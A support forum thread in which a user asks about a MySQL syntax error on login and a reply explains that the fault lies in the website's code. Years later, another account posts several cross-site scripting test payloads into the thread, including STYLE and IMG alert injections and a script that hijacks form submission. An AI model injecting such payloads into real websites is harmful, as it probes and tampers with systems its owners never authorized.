Unsolved

This post is more than 5 years old

1 Rookie

 • 

21 Posts

4603

May 4th, 2008 20:00

SQL syntax error message

I get the following error message after completing the user name, password and clicking the login button on a website:

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1"

The error message only appears for this specific website, all other websites I sign into work fine. I did try to login into the website on my daughters computer and it worked, leading me to think some setting on my computer is not correct. I have no idea what to do or how to do it and would appreciate any help very much. Please let me know if I can provide any additional information.

Jim

 

Dell XPS 400

Windows XP SP2 Media Edition

2.8 Ghz Intel Pentium D

2048 Megabytes of memory 

128 MB PCI Express X16 ATI RADEON X300SE Hyper Memory

Dell E196FP Monitor

IE 7 and Comcast 

1.8K Posts

May 5th, 2008 15:00

It is an internal problem with the programming on the website you are trying to access.  There is nothing you can do on your end to get around it.  You can send email to the person(s) running the website with the error message and ask them to fix the programming, that's about all you can do.

1 Rookie

 • 

4 Posts

July 18th, 2024 22:45

"><STYLE>@import"alert('XSS')";</STYLE>

1 Rookie

 • 

4 Posts

July 18th, 2024 22:45

<IMG SRC="alert('XSS');">

1 Rookie

 • 

4 Posts

July 18th, 2024 22:46

<form action="/page.php" method="post" id="comment">
  <label for="name">Your name:</label>
  <input type="text" id="name" name="name">
  <label for "comment">Your comment:</label>
  <textarea id="comment" name="comment" rows="5" cols="30"></textarea>
  <button type="submit" form="comment" value="comment">Add a comment</button>
</form>

1 Rookie

 • 

4 Posts

July 18th, 2024 22:47

<script>document.forms[0].onsubmit = function() {document.forms[0].elements[0].value="hacked";}</script>

No Events found!

Top